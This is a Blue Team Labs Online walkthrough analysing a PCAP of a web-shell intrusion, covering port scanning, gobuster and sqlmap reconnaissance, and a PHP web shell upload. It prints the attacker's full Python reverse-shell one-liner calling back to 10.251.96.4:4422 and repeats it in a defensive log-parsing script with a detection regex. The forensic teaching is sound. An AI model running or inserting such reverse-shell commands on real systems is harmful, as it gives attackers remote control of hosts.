BTLO — Network Analysis — Web Shell

BTLO (blueteamlabs.online)

The SOC received an alert in their SIEM for ‘Local to Local Port Scanning’ where an internal private IP began scanning another internal system. Can you investigate and determine if this activity is malicious or not? You have been provided a PCAP, investigate using any tools you wish.

Network Analysis — Web Shell requires analysis of a PCAP. Wireshark is a great tool to do this.

What is the IP responsible for conducting the port scan activity?

A good place to start in network analysis is to understand what hosts are communicating within the packet capture. Navigating to Statistics->Conversations->TCP will show which addresses are talking, as well as the ports used.

We know we’re looking for port scan activity, which means one IP address scanning many ports on another IP address. If we sort on the target’s (B) port list, we can see some obvious port scanning going on from the IP address 10.251.96.4.

Port Scanning Activity

What is the port range scanned by the suspicious host?

We can sort on Port B both ways to see the first and last ports scanned, which tells us the port range is 1-1024.

Scanned Port Range (Ascending (left) and Descending (right))

What is the type of port scan conducted?

We know it is 10.251.96.4 conducting the port scan, so we can filter on ip.src==10.251.96.4 to focus only on traffic from that host.

TCP SYN scan

Immediately we see a load of SYN packets sent to each port on 10.251.96.5. This tells us that a TCP SYN scan was conducted.

Two more tools were used to perform reconnaissance against open ports, what were they?

To get the first reconnaissance tool, we can look at User-Agent strings, which often carry a signature of the tool they originate from. Using the filter
ip.dst == 10.251.96.5 && http.user_agent shows us all the packets that have a user agent string to the target IP. We quickly see a pattern of HTTP GET requests, and inspecting one of these shows us a suspicious tool referenced in the user agent string — gobuster 3.0.1

gobuster in user agent string

To find the second reconnaissance tool, proceed beyond the gobuster packets and notice a packet with significant URL encoding and embedded SQL commands. This too has a user agent string, which tells us the tool used — sqlmap 1.4.7

What is the name of the php file through which the attacker uploaded a web shell?

When someone sends information to a webpage, it is through an HTTP POST request, so filtering for http.request.method==POST will show us all of these.
Scroll past the sqlmap requests (the SQL injection attempts we’ve seen before), and we see a POST to /upload.php. Looking at this closer, we see the Referer header, which shows the page the upload was submitted from — http://10.251.96.4/editprofile.php

HTTP POST — editprofile.php

What is the name of the web shell that the attacker uploaded?

Following the TCP stream (tcp.stream eq 1270) shows us the full request, where we can see the plaintext fileToUpload field, which names the file dbfunctions.php.

tcp.stream eq 1270

What is the parameter used in the web shell for executing commands?

Looking at the content of the identified dbfunctions.php, we can see that the parameter used in the web shell for executing commands is cmd.

cmd parameter used for executing commands

What is the first command executed by the attacker?

Now that we know the attacker IP and that they have already uploaded a file to act as a web shell, we can expect subsequent GET requests to that file to carry the commands to execute in the cmd parameter.

We can filter on ip.src==10.251.96.4 && http.request.method==GET to see the commands executed by the attacker, which appear in the request URL; the first one is id.

ip.src==10.251.96.4 && http.request.method==GET

What is the type of shell connection the attacker obtains through command execution?

The third command is clearly some Python script. Follow the TCP stream to view it in full.

GET /uploads/dbfunctions.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 HTTP/1.1

Decoding this script tells us that it is a reverse shell back to 10.251.96.4:4422 that runs /bin/sh.
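As an added example (not part of the original walkthrough), the following Python script reconstructs the attacker's command history from raw HTTP request lines the way an analyst would after exporting them from Wireshark: it pulls the cmd parameter out of every GET to the web shell path, URL-decodes it, and flags any command that opens a connect-back socket, recovering the host and port. The request lines below are a constructed sample; the id and python one-liner mirror what the walkthrough shows, while whoami and the index.php request are made up for the demo.

```python
import re
from urllib.parse import urlsplit, unquote

WEB_SHELL_PATH = "/uploads/dbfunctions.php"   # web shell path seen in the capture
CMD_PARAM = "cmd"                              # command parameter identified above
# Matches a Python-style connect-back such as s.connect(("host", port))
CALLBACK_RE = re.compile(r'connect\(\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)\)')


def extract_shell_command(request_line):
    """Return the decoded cmd value if the request line hits the web shell, else None."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    url = urlsplit(parts[1])
    if url.path != WEB_SHELL_PATH:
        return None
    # Split the query by hand: parse_qs on older Pythons also splits on ';',
    # which would chop the attacker's one-liner into pieces.
    for pair in url.query.split("&"):
        key, _, value = pair.partition("=")
        if key == CMD_PARAM:
            return unquote(value)   # %20 -> space, %22 -> ", %27 -> '
    return None


def callback_target(command):
    """Return (host, port) if the command opens a reverse-shell connect-back, else None."""
    match = CALLBACK_RE.search(command)
    return (match.group(1), int(match.group(2))) if match else None


def reconstruct_activity(request_lines):
    """Turn raw request lines into the ordered list of commands the shell executed."""
    events = []
    for line in request_lines:
        cmd = extract_shell_command(line)
        if cmd is not None:
            events.append({"cmd": cmd, "callback": callback_target(cmd)})
    return events


SAMPLE_REQUESTS = [   # constructed sample input, see lead-in
    "GET /uploads/dbfunctions.php?cmd=id HTTP/1.1",
    "GET /uploads/dbfunctions.php?cmd=whoami HTTP/1.1",
    "GET /uploads/dbfunctions.php?cmd=python%20-c%20%27import%20socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));"
    "os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);"
    "p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 HTTP/1.1",
    "GET /index.php?id=1 HTTP/1.1",
]

if __name__ == "__main__":
    for i, event in enumerate(reconstruct_activity(SAMPLE_REQUESTS), 1):
        note = " -> reverse shell to %s:%d" % event["callback"] if event["callback"] else ""
        print(i, event["cmd"][:60] + note)
```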

What is the port he uses for the shell connection?

Again, looking at the Python script, the port of the shell connection is 4422.

Analysis of the PCAP has shown reconnaissance against the target IP (port scanning, gobuster, and sqlmap), leading to the upload of a suspicious file and command execution that created a reverse shell.

Chris Eastwood
Blue Team Labs Online — Walkthroughs

Incident Response, Forensic Investigations, and Threat Hunting professional, writing things to learn them better.